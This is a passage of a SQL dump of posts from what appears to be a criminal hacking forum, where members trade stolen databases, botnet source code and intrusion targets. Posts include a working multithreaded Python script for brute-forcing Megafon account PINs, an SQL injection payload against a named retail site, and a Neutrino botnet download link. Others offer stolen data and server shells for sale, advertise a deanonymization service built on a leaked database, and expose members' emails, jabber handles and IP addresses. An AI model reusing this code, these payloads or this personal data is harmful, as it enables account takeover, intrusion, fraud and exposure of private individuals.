DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://www.youtube.com/user/lekssaysahmed | http://www.youtube.com/user/lekssaysahmed \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(2225, 1092, 1747, 'demonic', 119, '', 1420649717, 'all the above links are not working... can you please reupload it? thanks', 1, 0, '199.254.238.139', 0, 1, 0, 0, 0),
(2234, 1826, 0, 'admin', 1, 'деанон через vk', 1421086243, 'Пилю по немногу сервис по деанонимизации через вк.\n\n[url]http://5.9.248.248/index.php?query=178.64.173.61[/url]\n\nпоиск потдерживает IP и mail', 1, 0, '46.146.211.11', 0, 1, 0, 0, 0),
(2235, 1826, 2234, 'Psych0tr1a', 11, '', 1421147351, '[quote=admin;2234]Пилю по немногу сервис по деанонимизации через вк.\r\n\r\n[url]http://5.9.248.248/index.php?query=178.64.173.61[/url]\r\n\r\nпоиск потдерживает ip и mail[/quote]\r\n\r\n\r\nа как работает то?', 1, 0, '195.191.88.99', 0, 1, 0, 0, 0),
(2236, 1826, 2235, 'admin', 1, '', 1421149395, 'вводиш ип или мыло, базу слил у topface.', 1, 0, '46.146.211.11', 0, 1, 0, 0, 0),
(2241, 1826, 2236, 'Psych0tr1a', 11, '', 1421252091, 'норм\r\n\r\nно инфы маловато будет...\r\nнужно привлекать торонних исследователей полюбому', 1, 0, '195.191.88.99', 0, 1, 0, 0, 0),
(2242, 1826, 2241, 'admin', 1, '', 1421257940, '90млн не все импортированно', 1, 0, '46.146.211.11', 0, 1, 0, 0, 0),
(2245, 1830, 0, 'admin', 1, 'new admin - yakuza112', 1422122659, 'New admin - yakuza112', 1, 0, '46.146.211.11', 0, 1, 0, 0, 0),
(2246, 1830, 2245, 'TetraQ', 154, '', 1422274910, 'Gratz - yakuza112', 1, 0, '79.134.209.106', 0, 1, 0, 0, 0),
(2250, 1015, 1017, 'negeeb', 161, '', 1427460194, 'перезалейте плз', 1, 0, '173.245.53.98', 0, 1, 0, 0, 0),
(2251, 1064, 2193, 'reversing4', 135, '', 1427668463, '[url]http://slaughterandmay.com[/url] - куплю их базенки, либо любые данные и баги', 1, 0, '173.245.53.69', 4, 1, 0, 0, 0),
(2252, 1064, 2251, 'w0rm', 100, '', 1427703876, 'сегодня гляну', 1, 0, '141.101.92.197', 0, 1, 0, 0, 0),
(2260, 1834, 0, 'syslink', 13, 'Source code android locker', 1432480259, 'for sale \r\npm or post here if interested', 1, 0, '108.162.254.195', 0, 1, 0, 0, 0),
(2267, 1015, 2250, 'Versus71', 165, '', 1436023346, 'Так же прошу перезалить второй пост темы. Dropbox вроде не должен удалять файлы.', 1, 0, '173.245.48.247', 0, 1, 0, 0, 0),
(2270, 1145, 1239, 'Versus71', 165, '', 1436321646, 'Нашел у себя, перезаливаю. Интересно, откуда конкретно эта копия. Я знаю он на siph0n\'e есть, но в своих паблик базах они им не афишировали. Плюс еще раньше, достаточно давно, им на ачате пытались барыжить.\r\n\r\nDownload:\r\n[url]https://mega.co.nz/#!WRAlASoB!ZWeOL0b_HMeHS8OU8pM5-eyCsz_e1zS9zAysWgvMFFQ[/url]\r\n\r\nPass:g^&*vFD129_+:ASgft%4VBgak', 1, 0, '173.245.48.247', 0, 1, 0, 0, 0),
(2271, 1840, 0, 'Versus71', 165, 'forum-seo.net', 1437013460, 'Форум web-мастеров, посвященный SEO тематике.\r\n\r\nMembers: 13 503\r\n\r\nDownload:\r\n[url]https://mega.co.nz/#!nBxwGDza!OPnjlU8eB5eIazk9-99DT6p13_J7RTDuiRCWBFNAWwM[/url]\r\nPass:\r\n7Y)(;L12@HGFnvb567Hj0(', 1, 0, '173.245.48.247', 0, 1, 0, 0, 0),
(2272, 1841, 0, 'Versus71', 165, 'phreaker.us', 1437629241, 'Ресурс посвящен фрикингу и прочим аспектам информационной безопасности.\r\n\r\nСкачать:\r\n[url]https://mega.co.nz/#!OVpFgDAB!PzQW47TKtM520hPf3dRQLry8O0ACgKkrJpP_5-drpM4[/url]\r\nПароль:\r\n5t*&nbF120+_:\"gfBA+|\"l;gHTbF', 1, 0, '199.27.133.175', 0, 1, 0, 0, 0),
(2279, 1848, 0, 'Invite', 2, 'metaizm', 1439096915, '[SIZE=\'4\'][COLOR=\'Sienna\']nickname: metaizm[/COLOR][/SIZE]\n [b]Age:[/b] 20\n [b]Comments:[/b] .', 1, 0, '141.101.105.197', 0, 1, 0, 0, 0),
(2283, 1830, 2246, 'Guest', 170, '', 1439205901, 'congo new admin :)', 1, 1, '162.158.95.235', 0, 1, 0, 0, 0),
(2285, 1853, 0, 'Invite', 2, 'tdss', 1439233133, '[SIZE=\'4\'][COLOR=\'Sienna\']nickname: tdss[/COLOR][/SIZE]\n [b]Age:[/b] 21\n [b]Comments:[/b] My knowledge of IT ranges between the following: sql, bash, c++, \r\nphp, html, css, js, java, perl regex, lua, pentesting, malware \r\nanalysis, network security, attack mitigation, cracking passwords, \r\nsoftware testing, vulnerability testing, etc.\r\n\r\nMy achievements? Well, I was the main tester of Exaction \r\nCryptolocker and Fearlocker, and am a core internal-team \r\nmember of Maxthon, the Chinese browser.\r\n\r\nI have Aspergers\' and I currently attend a private university for \r\nhistory, and have taken compsci classes. I analyze breaches all \r\nthe time, and often give suggestions for better security.\r\n\r\nJabber: ciphernetic@monopoly.cc\r\n\r\nkorovka.cc/member.php?u=2262\r\nlampeduza.so/user/10589-dark-hacks\r\nexploit.in/forum/index.php?showuser=52011\r\nxakfor.net/members/maltivera.6168\r\nfreehacks.ru/member.php?u=8046\r\ntrojanforge.co/member.php/77-whatsahoober\r\nhackyard.net/forum/member.php?u=940\r\ncrimes.ws/member.php?u=4597\r\ninfraud.cc/member.php?u=10655\r\ndrk.bz/member.php?u=36220\r\nmonopoly.ms/user/1393-ciphernetic\r\nmobfamily.ws/memberlist.php?mode=viewprofile&u=54\r\njomgegar.com/user-2082.html\r\nkernelmode.info/forum/memberlist.php?\r\nmode=viewprofile&u=6477\r\nrelicd7edydsci7u.onion/index.php?action=profile;u=102\r\ngenesisktrk2q3ud.onion/index.php?action=profile;u=156.', 1, 0, '173.245.54.227', 0, 1, 0, 0, 0),
(2287, 1855, 0, 'st1x0', 171, 'geneticsandsociety.org', 1439273803, 'delete site', 1, 0, '162.158.90.187', 0, 1, 0, 0, 0),
(2299, 1858, 0, 'Invite', 2, 'gagaloop', 1439404016, '[SIZE=\'4\'][COLOR=\'Sienna\']nickname: gagaloop[/COLOR][/SIZE]\n [b]Age:[/b] 28\n [b]Comments:[/b] System architect, good knowledge in linux/freebsd system\'s and \r\nwidows system\'s. I\'m penetration tester, work with web-based \r\nsystems.\r\nprofiles:\r\nhttps://exploit.in/forum/index.php?showuser=61504\r\nhttp://xakfor.net/members/1qoot1.5170/\r\n\r\nemail: gagalo0pp@gmail.com\r\njabber: gagaloop@exploit.im.', 1, 0, '162.158.93.19', 0, 1, 0, 0, 0),
(2300, 1859, 0, 'w0rm', 100, 'megafon', 1439792087, 'brute megafon accounts via Yandex wiget\r\n[code]\r\n*.megafon.ru/WIDGET_INFO/GET_INFO?X_Username=&X_Password=&CHANNEL=WYANDEX&LANG_ID=0&P_RATE_PLAN_POS=1&P_PAYMENT_POS=2&P_ADD_SERV_POS=4&P_DISCOUNT_POS=3\r\n[/code]\r\nX_Username=*mobile_phone*\r\nX_Password=*PIN_via_sms* - always 6 num\r\n*.megafon.ru - zone, \'uralsg\' for example\r\n\r\nAjax.callback[\"ERROR\"] - if false\r\nalse it will be forme with payment details, we can login from lk.megafon.ru\r\n\r\nfor generate new password [url]https://*.megafon.ru/[/url]', 1, 0, '162.158.91.143', 0, 1, 0, 0, 0),
(2303, 1861, 0, 'hunter_exploitkit', 172, 'download Neutrino Botnet source code + builder', 1439821381, 'download Neutrino Botnet source code + builder \r\n\r\n[url]https://mega.nz/#!DpVQlYyA!PZYAc286oxonu9L6HYHSE36Wf5o4HVErK2H2RJ5w368[/url]\r\n\r\n\r\n===========================\r\n[email]exploitkit@jabb3r.org[/email]', 1, 0, '108.162.229.192', 0, 1, 0, 0, 0),
(2304, 1859, 2300, 'w0rm', 100, 'python3', 1439824907, '[code]\r\n#!/usr/bin/env python\r\n# -*- coding: utf-8 -*-\r\n\r\nfrom threading import Thread\r\nimport requests\r\nimport sys\r\nfrom queue import Queue\r\n\r\nurl = \'https://uralsg.megafon.ru/WIDGET_INFO/GET_INFO?X_Username=9222455455&X_Password=%s&CHANNEL=WYANDEX&LANG_ID=0&P_RATE_PLAN_POS=1&P_PAYMENT_POS=2&P_ADD_SERV_POS=4&P_DISCOUNT_POS=3\'\r\nconcurrent = 200\r\n\r\ndef doWork():\r\n while True:\r\n password = q.get()\r\n getStatus(password)\r\n q.task_done()\r\n\r\ndef getStatus(password):\r\n try:\r\n r = requests.get(url % password)\r\n if not(\'Wrong password\' in r.text):\r\n print(\'PIN found: %s\' % password)\r\n sys.exit(1)\r\n except:\r\n pass\r\n\r\nq = Queue(concurrent * 2)\r\nfor i in range(concurrent):\r\n t = Thread(target=doWork)\r\n t.daemon = True\r\n t.start()\r\ntry:\r\n for a in range(7):\r\n for b in range(7):\r\n for c in range(7):\r\n for d in range(7):\r\n for e in range(7):\r\n for f in range(7):\r\n q.put(\'{}{}{}{}{}{}\'.format(a, b, c, d, e, f))\r\n q.join()\r\nexcept KeyboardInterrupt:\r\n sys.exit(1)\r\n[/code]', 1, 0, '162.158.90.82', 0, 1, 0, 0, 0),
(2305, 1862, 0, 'w0rm', 100, 'Black box list', 1439826864, 'xhamster\r\npornhub\r\nyouporn.com\r\nredtube\r\nextremetube\r\nripoffreport(10,000$-shell only)\r\nroblox\r\nvoyeurhit.com\r\nxvideos.com', 1, 0, '162.158.90.82', 0, 1, 0, 0, 0),
(2306, 1862, 2305, 'w0rm', 100, '', 1439827738, 'uploadable.ch\r\nrapidgator.net', 1, 0, '162.158.90.82', 0, 1, 0, 0, 0),
(2307, 1862, 2306, 'st1x0', 171, '', 1439846072, 'my-formosa.com', 1, 0, '141.101.105.166', 0, 1, 0, 0, 0),
(2308, 1862, 2307, 'w0rm', 100, '', 1439857424, 'Zencart shop sql-i. Any.', 1, 0, '162.158.90.82', 0, 1, 0, 0, 0),
(2312, 1862, 2308, 'w0rm', 100, '', 1440000289, '*.salesforce.com', 1, 0, '162.158.90.82', 0, 1, 0, 0, 0),
(2313, 1864, 0, 'Invite', 2, 'nickname', 1440010165, '[SIZE=\'4\'][COLOR=\'Sienna\']nickname: nickname[/COLOR][/SIZE]\n [b]Age:[/b] age\n [b]Comments:[/b] .', 1, 0, '141.101.98.196', 0, 1, 0, 0, 0),
(2314, 1865, 0, 'Invite', 2, 'ree4', 1440013600, '[SIZE=\'4\'][COLOR=\'Sienna\']nickname: ree4[/COLOR][/SIZE]\n [b]Age:[/b] 18\n [b]Comments:[/b] hi\r\ni have more than 80 china hacktools 40 china elf(rat+builder) , \r\nbetabot original builder + panel , exploit kit master , card recon \r\n, rat source code botnet source code crypter source code + more \r\nhacktools.\r\n\r\nmy skills\r\nc/c++=70% know\r\nc#=100%know\r\nhtml css javascript=50%\r\nphp=100%\r\nect ect ect\r\n\r\nthanx\r\nree4.', 1, 0, '141.101.98.253', 0, 1, 0, 0, 0),
(2317, 1861, 2303, 'st1x0', 171, '', 1440077912, 'спасибо за neutrino) builder - палится ли антивирусами?', 1, 0, '162.158.90.187', 0, 1, 0, 0, 0),
(2318, 1868, 0, 'Invite', 2, 'Phant0m', 1440201655, '[SIZE=\'4\'][COLOR=\'Sienna\']nickname: Phant0m[/COLOR][/SIZE]\n [b]Age:[/b] 20\n [b]Comments:[/b] Im web developer\r\nwith advanced\r\nknowledge of\r\nPHP/MySQL/PDO/OOP\r\n(have coded few\r\npanels for bots can\r\nshow). I have solid\r\nknowledge of sql\r\ninejction including\r\nmanual and with\r\ntools (sqlmap). My\r\nbiggest hit since\r\nnow is\r\nhttp://www.nespresso.com\r\nwith 5k alexa rank\r\nin USA, 4,9k global\r\nrank and around 3\r\nmilion monthly\r\nvisitors, where i\r\nfound sqli but wasnt\r\nable to bypass it\r\n(/pro/npopzoom.php\r\n?id_machine=N_CS_220_0\'+/*!12345UNION*/\r\n/*!12345SELECT*/\r\n1,2,3,4,5,/*!12345version()*/,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27--\r\n-\r\n&zoomstep=1)\r\nMainly reason im\r\ncommin on forum is\r\nthat i have few more\r\ntargets that im\r\nunable to bypass,\r\nalso to learn some\r\nadvanced methods of\r\npentesting and meet\r\nyou :)\r\nmy jabber is:\r\nbotox@exploit.im\r\nand not so active on\r\nforums i have acc on\r\nlampeduza:\r\nhttps://lampeduza.so/user/22349-phant0m/\r\n0day.in -\r\nhttps://0day.in/user-7709.html\r\nand crdclub-\r\nhttp://crdclub.ws/member.php?u=27190\r\nlooking forward to\r\nmeet u :D peace.', 1, 0, '141.101.92.207', 0, 1, 0, 0, 0),
(2319, 1861, 2317, '*Hash*', 164, '', 1440227041, 'надеюсь билдер еще не в паблике ?', 1, 0, '162.158.91.203', 0, 1, 0, 0, 0),
(2320, 1869, 0, 'Invite', 2, 'bidex', 1440258049, '[SIZE=\'4\'][COLOR=\'Sienna\']nickname: bidex[/COLOR][/SIZE]\n [b]Age:[/b] 25\n [b]Comments:[/b] .', 1, 0, '108.162.208.241', 0, 1, 0, 0, 0),
(2321, 1861, 2319, 'hunter_exploitkit', 172, '', 1440263239, 'mega upload link it\'s account for me', 1, 0, '162.158.91.230', 0, 1, 0, 0, 0),
(2322, 1861, 2321, 'st1x0', 171, '', 1440282210, 'Уже есть в паблике\n[url]https://damagelab.org/index.php?showtopic=25992&hl=[/url]\n[url]https://exploit.in/forum/index.php?showtopic=92564[/url]\n\nИ палится всеми (((', 1, 0, '173.245.53.121', 0, 1, 0, 0, 0),
(2323, 1861, 2322, '*Hash*', 164, '', 1440332079, 'билдер не запускается пишет не хватает dll, не подскажете как запустить ?', 1, 0, '162.158.90.200', 0, 1, 0, 0, 0),
(2324, 1861, 2323, 'hunter_exploitkit', 172, '', 1440333472, 'copy msvcp100.dll to side of builder', 1, 0, '162.158.90.193', 0, 1, 0, 0, 0),
(2325, 1870, 0, 'Invite', 2, 'NFM, nfmka', 1440398653, '[SIZE=\'4\'][COLOR=\'Sienna\']nickname: NFM, nfmka[/COLOR][/SIZE]\n [b]Age:[/b] 26\n [b]Comments:[/b] ßрþфøûь ýð ðýтøчðтõ \r\nhttp://forum.antichat.ru/members/21520/ . Ãâ€Ã°Ã²Ã½Ã¾ тðü уöõ ýõ \r\nÑÂøöу.\r\nÃÂð ôðýýыù üþüõýт òþ÷óûðòÃȄÂÑŽ úþüðýôу ÿþ øýфþñõ÷þÿðÑÂýþÑÂтø \r\nò Úð÷ðхÑÂтðýõ www.cybersec.kz . ßþôýøüðõü òþÿрþÑÂÑ‹ \r\nøýфþрüðцøþýýþù ñõ÷þÿðÑÂýþÑÂтø ò ÑÂтрðýõ. ×ðýøüðõüÑÂÑ \r\nÿõýтõÑÂтþü ýðцúþüÿðýøø.\r\n×ð üõýѠüþóут ÿþручøтьÑÂѠучðÑÂтýøúø Slider ø Twoster (áøôõûø \r\nýð ðýтøчðтõ, õÑÂть ýð рôþтõ).', 1, 0, '141.101.105.179', 0, 1, 0, 0, 0),
(2326, 1871, 0, 'Invite', 2, 'dark001', 1440413665, '[SIZE=\'4\'][COLOR=\'Sienna\']nickname: dark001[/COLOR][/SIZE]\n [b]Age:[/b] 32\n [b]Comments:[/b] Hi\r\n\r\nI am dark001 and sometimes darkside on different dark-net \r\nforums. As for security and contribution, I have more less 3.5 \r\nyears of experience in the cyber security area as “white-hat \r\nhacker†as my daily job (and many more years of amateur \r\npursuit of this passion), consulting for clients (performing \r\npenetration tests, security assessments). \r\n\r\nI also have a university degree in a computer profession, as \r\nwell as IT knowledge in a variety of programming languages \r\n(Java, .Net, C, C++, Assembler, python, etc.).\r\nAs a “night-job†I deal with Fraud including Phishing, carding, \r\nusing my knowledge to perform SQLi on different websites to \r\nacquire knowledge and of course, merchandise the collected \r\ndata. After being present on different hacking forums for a few \r\nyears, I made a break and now I am back with the willing of \r\nsharing information and looking for new challenges.\r\n\r\nInterested in knowledge and projects which can exploit zero \r\ndays on PoS, corporate software and creating and developing \r\nof profitable Trojans (banking Trojans, ransomwares etc.). I \r\nam also performing research on the Darknet including TOR \r\nrelays and anonymity to help the open source community. \r\n\r\nI am for the freedom of information and the share of \r\ninteresting data related to cyber security issues I will be \r\ninterested in joining your community in order to contribute, \r\ncooperate, share and exchange about hacking, cracking and \r\nother cyber related subjects.\r\n\r\n.', 1, 0, '173.245.53.106', 0, 1, 0, 0, 0),
(2783, 2316, 0, 'Invite', 2, 'nickname', 1442833996, '[SIZE=\'4\'][COLOR=\'Sienna\']nickname: nickname[/COLOR][/SIZE]\n[b]Age:[/b] age\n[b]jabber:[/b] jabber\n[b]Comments:[/b] .', 1, 0, '141.101.87.37', 0, 1, 0, 0, 0),
(2787, 2319, 0, 'Invite', 2, 'esmurf', 1442836747, '[SIZE=\'4\'][COLOR=\'Sienna\']nickname: esmurf[/COLOR][/SIZE]\n[b]Age:[/b] 45\n[b]jabber:[/b] esmurf\n[b]Comments:[/b] Network guy..', 1, 0, '141.101.98.164', 0, 1, 0, 0, 0),
(2788, 2320, 0, 'Invite', 2, 'nickname', 1442836800, '[SIZE=\'4\'][COLOR=\'Sienna\']nickname: nickname[/COLOR][/SIZE]\n[b]Age:[/b] age\n[b]jabber:[/b] jabber\n[b]Comments:[/b] .', 1, 0, '141.101.98.164', 0, 1, 0, 0, 0),
(2789, 2321, 0, 'Invite', 2, 'esmurf', 1442837150, '[SIZE=\'4\'][COLOR=\'Sienna\']nickname: esmurf[/COLOR][/SIZE]\n[b]Age:[/b] 45\n[b]jabber:[/b] esmurf@jabber.hot-chilli.net\n[b]Comments:[/b] Network guy..', 1, 0, '141.101.98.164', 0, 1, 0, 0, 0),
(2790, 2322, 0, 'Invite', 2, 'nickname', 1442902476, '[SIZE=\'4\'][COLOR=\'Sienna\']nickname: nickname[/COLOR][/SIZE]\n[b]Age:[/b] age\n[b]jabber:[/b] jabber\n[b]Comments:[/b] .', 1, 0, '162.158.90.207', 0, 1, 0, 0, 0),
(2791, 2323, 0, 'Invite', 2, '500mhz', 1442903806, '[SIZE=\'4\'][COLOR=\'Sienna\']nickname: 500mhz[/COLOR][/SIZE]\n[b]Age:[/b] \n[b]jabber:[/b] 500mhz@jabber.org\n[b]Comments:[/b] dev/crack/reverse/bot/malware.', 1, 0, '162.158.94.235', 0, 1, 0, 0, 0),
(2792, 2324, 0, 'Invite', 2, 'riss', 1442908839, '[SIZE=\'4\'][COLOR=\'Sienna\']nickname: riss[/COLOR][/SIZE]\n[b]Age:[/b] 25\n[b]jabber:[/b] icq 589043292\n[b]Comments:[/b] хþчу ýðùчøтьÑÂÑÂ.', 1, 0, '141.101.104.15', 0, 1, 0, 0, 0),
(2793, 2325, 0, 'Invite', 2, 'slider', 1442914240, '[SIZE=\'4\'][COLOR=\'Sienna\']nickname: slider[/COLOR][/SIZE]\n[b]Age:[/b] 25\n[b]jabber:[/b] ICQ: 1357-540\n[b]Comments:[/b] I work in the field\r\nof information\r\nsecurity for more\r\nthan 8 years\r\nI try to find new\r\ncombinations of\r\nvectors and for the\r\nuse of standard\r\nvulnerabilities .. \r\nI have the knowledge\r\nof Perl, C#, PHP..\r\narsenal has all the\r\nnecessary knowledge\r\nto write exploits,\r\nbruteforce,\r\nparsers..\r\n\r\nI am looking for a\r\nplace where I could\r\nshare knowledge and\r\nbest practices..\r\n\r\nE-Mail:\r\nslider.the@gmail.com\r\nICQ: 1357-540\r\n\r\nhttp://forum.antichat.ru/members/18927/\r\nhttps://rdot.org/forum/member.php?u=233.', 1, 0, '141.101.88.5', 0, 1, 0, 0, 0),
(2834, 2372, 0, 'Invite', 2, 'DocXor', 1443104630, '[SIZE=\'4\'][COLOR=\'Sienna\']nickname: DocXor[/COLOR][/SIZE]\n[b]Age:[/b] 25\n[b]jabber:[/b] DocXor@crypt.am\n[b]Comments:[/b] рõòõрÑÂ-øýöõýõр, øÑÂÑÂûõôþòðтõûь ñõ÷þÿðÑÂýþÑÂтø, \r\nрðñþтðû ò av-øýôуÑÂтрøø.', 1, 0, '141.101.80.240', 0, 1, 0, 0, 0),
(2824, 1830, 2283, 'Fuhrer666', 163, '', 1443045788, 'Congratulations on your new range ykz112.', 1, 0, '108.162.210.216', 0, 1, 0, 0, 0),
(2823, 2364, 0, 'Invite', 2, 'nickname', 1443023396, '[SIZE=\'4\'][COLOR=\'Sienna\']nickname: nickname[/COLOR][/SIZE]\n[b]Age:[/b] age\n[b]jabber:[/b] jabber\n[b]Comments:[/b] .', 1, 0, '141.101.99.128', 0, 1, 0, 0, 0),
(2822, 2363, 0, 'Invite', 2, 'f0ros', 1443022317, '[SIZE=\'4\'][COLOR=\'Sienna\']nickname: f0ros[/COLOR][/SIZE]\n[b]Age:[/b] 30\n[b]jabber:[/b] \n[b]Comments:[/b] email: f0ros552@gmail.com\r\n\r\nSpecialization : SQL, PHP, HTML/CSS, JavaScript, \r\nSymfony2, PHP extensions. Interesting in web \r\nsecurity. Web application vulnerabilities, such as \r\nthose found to be vulnerable to XSS (e.g., JS \r\ninjection), SQLi, and occur in any language/framework.', 1, 0, '173.245.53.80', 0, 1, 0, 0, 0),
(2821, 2362, 0, 'Invite', 2, 'as1w', 1443020435, '[SIZE=\'4\'][COLOR=\'Sienna\']nickname: as1w[/COLOR][/SIZE]\n[b]Age:[/b] 19\n[b]jabber:[/b] 12asaswsd@jabber.com\n[b]Comments:[/b] slas.', 1, 0, '173.245.53.70', 0, 1, 0, 0, 0),
(2820, 2361, 0, 'Invite', 2, 'Oleg', 1443007048, '[SIZE=\'4\'][COLOR=\'Sienna\']nickname: Oleg[/COLOR][/SIZE]\n[b]Age:[/b] 33\n[b]jabber:[/b] jabber\n[b]Comments:[/b] .', 1, 0, '162.158.90.232', 0, 1, 0, 0, 0),
(2819, 2360, 0, 'Invite', 2, 'crackss', 1443006075, '[SIZE=\'4\'][COLOR=\'Sienna\']nickname: crackss[/COLOR][/SIZE]\n[b]Age:[/b] 28\n[b]jabber:[/b] hetcrac@qip.ru\n[b]Comments:[/b] SSSSs.', 1, 0, '141.101.105.48', 0, 1, 0, 0, 0),
(2817, 2359, 0, 'Invite', 2, 'nickname', 1443000057, '[SIZE=\'4\'][COLOR=\'Sienna\']nickname: nickname[/COLOR][/SIZE]\n[b]Age:[/b] age\n[b]jabber:[/b] jabber\n[b]Comments:[/b] .', 1, 0, '141.101.96.4', 0, 1, 0, 0, 0),
(2816, 2358, 0, 'Invite', 2, 'Russo', 1442960147, '[SIZE=\'4\'][COLOR=\'Sienna\']nickname: Russo[/COLOR][/SIZE]\n[b]Age:[/b] 32\n[b]jabber:[/b] jabber\n[b]Comments:[/b] I am fond of IT, I am interested in network \r\ncommunications, communication safety, \r\ncommunication of Ren871@hotmail .com with me.', 1, 0, '162.158.90.232', 0, 1, 0, 0, 0),
(2815, 2357, 0, 'Invite', 2, 'json10331', 1442950510, '[SIZE=\'4\'][COLOR=\'Sienna\']nickname: json10331[/COLOR][/SIZE]\n[b]Age:[/b] 57\n[b]jabber:[/b] gpgruss@crypt.mn\n[b]Comments:[/b] fraud.', 1, 0, '173.245.52.145', 0, 1, 0, 0, 0),
(2801, 2346, 0, 'w0rm', 100, 'hackers & carders forums', 1442919903, '- carder.su\n- carder.pro\n- carders.cc\n- carderplanet.biz\n- forum.xakepok.org\n- green-hack.net\n- inattack\n- kiber-zona.org\n- verified.ms\n- antichat \n- asechka\n- blackseoschool\n- cih\n- damagelab\n- darklife\n- dehak.ru\n- exploit.in\n- hackzone\n- kode.cc\n- maza\n- korovka.cc\n- milw0rm\n\n[email]root@w0rm.ws[/email] -\n\nAll for 500$.', 1, 0, '141.101.80.172', 0, 1, 0, 0, 0),
(2800, 2342, 0, 'w0rm', 100, 'Monopoly.ms', 1442918885, 'source + db \nPrice : 500$\n2k+ users. 08.09.2015.\nJabber : [email]root@w0rm.ws[/email] -', 1, 0, '141.101.80.172', 0, 1, 0, 0, 0),
(3045, 2505, 0, 'ke7hb', 387, 'westernunion.com', 1463758995, '2TB data\nHistory of transactions\nAccounts (SHA1 hashed, users + employees)\nShell on storage server (not wu.com)\n\ndb only: 6k in BTC\ndb + shell: 17k in BTC\n\nJabber: [email]ke7hb@w0rm.ws[/email]', 1, 0, '37.187.129.166', 0, 1, 0, 0, 0),
(2771, 2239, 2755, 'w0rm', 100, '', 1442782936, 'in future:\r\n* hackbot understanding comands like: sqlmap -u etc via jabber.\r\n* BlackBox ToDo list for all @w0rm.ws users.', 1, 0, '162.158.90.112', 0, 1, 0, 0, 0),
(2770, 2306, 0, 'Invite', 2, 'tunboy', 1442782064, '[SIZE=\'4\'][COLOR=\'Sienna\']nickname: tunboy[/COLOR][/SIZE]\n[b]Age:[/b] 26\n[b]jabber:[/b] m_y_y@mail.ru\n[b]Comments:[/b] .', 1, 0, '141.101.92.199', 0, 1, 0, 0, 0),
(2769, 2305, 0, 'Invite', 2, 'nickname', 1442778920, '[SIZE=\'4\'][COLOR=\'Sienna\']nickname: nickname[/COLOR][/SIZE]\n[b]Age:[/b] age\n[b]jabber:[/b] jabber\n[b]Comments:[/b] .', 1, 0, '162.158.91.184', 0, 1, 0, 0, 0),
(2768, 2304, 0, 'Invite', 2, 'noescape0', 1442778012, '[SIZE=\'4\'][COLOR=\'Sienna\']nickname: noescape0[/COLOR][/SIZE]\n[b]Age:[/b] 19\n[b]jabber:[/b] noescape0@jabber.me\n[b]Comments:[/b] 19, male, russian. \r\nWorking as a freelancer. \r\nKnowledge related to IT:\r\nmajor:\r\nC#, ASP.NET, unity3d.\r\nminor:\r\nAHK, css, html, js\r\n\r\nIm a newbie related to hacking but in a process of \r\ngathering some usefull information. Heard about \r\nw0rm from an article on xakep.ru\r\n\r\n\r\nmail: NoEscape0@ya.ru\r\nskype: noescape0.', 1, 0, '162.158.91.159', 0, 1, 0, 0, 0),
(2767, 2303, 0, 'Invite', 2, 'anri12', 1442774668, '[SIZE=\'4\'][COLOR=\'Sienna\']nickname: anri12[/COLOR][/SIZE]\n[b]Age:[/b] 53\n[b]jabber:[/b] \n[b]Comments:[/b] i\'m beginer in linux operation system and need some \r\nhelp with wlan0 problem without compat file and shit \r\nwhat\'s does not work i need real advice.', 1, 0, '162.158.92.19', 0, 1, 0, 0, 0),
(2764, 2300, 0, 'Invite', 2, 'Full_Crash', 1442761011, '[SIZE=\'4\'][COLOR=\'Sienna\']nickname: Full_Crash[/COLOR][/SIZE]\n[b]Age:[/b] age\n[b]jabber:[/b] jabber\n[b]Comments:[/b] .', 1, 0, '162.158.90.112', 0, 1, 0, 0, 0),
(2765, 2301, 0, 'Invite', 2, 'Zhak', 1442761194, '[SIZE=\'4\'][COLOR=\'Sienna\']nickname: Zhak[/COLOR][/SIZE]\n[b]Age:[/b] 18\n[b]jabber:[/b] Zhak\n[b]Comments:[/b] asdf.', 1, 0, '141.101.92.219', 0, 1, 0, 0, 0),
(2766, 2302, 0, 'Invite', 2, 'Zhak', 1442761346, '[SIZE=\'4\'][COLOR=\'Sienna\']nickname: Zhak[/COLOR][/SIZE]\n[b]Age:[/b] 18\n[b]jabber:[/b] Zhak@mail.ru\n[b]Comments:[/b] yes i am it sjpesialist and work in it good job good \r\nknowlage The most important field. Here you \r\nmust specify the service area of knowledge related \r\nto IT, their skills in different areas, their \r\nachievements, releases and profiles on famous it-\r\nportals, the potential usefulness of the project and \r\nso on. A small description of yourself is \r\nencouraged. You can also leave a jabber and other \r\nalternative addresses for communication, in short, \r\neverything that you see fit to bring to our attention. \r\nThe minimum length of 200 characters, maximum \r\n4,000. The most important field. Here you must \r\nspecify the service area of knowledge related to IT, \r\ntheir skills in different areas, their achievements, \r\nreleases and profiles on famous it-portals, the \r\npotential usefulness of the project and so on. A \r\nsmall description of yourself is encouraged. You \r\ncan also leave a jabber and other alternative \r\naddresses for communication, in short, everything \r\nthat you see fit to bring to our attention. The \r\nminimum length of 200 characters, maximum \r\n4,000. The most important field. Here you must \r\nspecify the service area of knowledge related to IT, \r\ntheir skills in different areas, their achievements, \r\nreleases and profiles on famous it-portals, the \r\npotential usefulness of the project and so on. A \r\nsmall description of yourself is encouraged. You \r\ncan also leave a jabber and other alternative \r\naddresses for communication, in short, everything \r\nthat you see fit to bring to our attention. The \r\nminimum length of 200 characters, maximum \r\n4,000. The most important field. Here you must \r\nspecify the service area of knowledge related to IT, \r\ntheir skills in different areas, their achievements, \r\nreleases and profiles on famous it-portals, the \r\npotential usefulness of the project and so on. A \r\nsmall description of yourself is encouraged. You \r\ncan also leave a jabber and other alternative \r\naddresses for communication, in short, everything \r\nthat you see fit to bring to our attention. The \r\nminimum length of 200 characters, maximum \r\n4,000..', 1, 0, '141.101.92.219', 0, 1, 0, 0, 0),
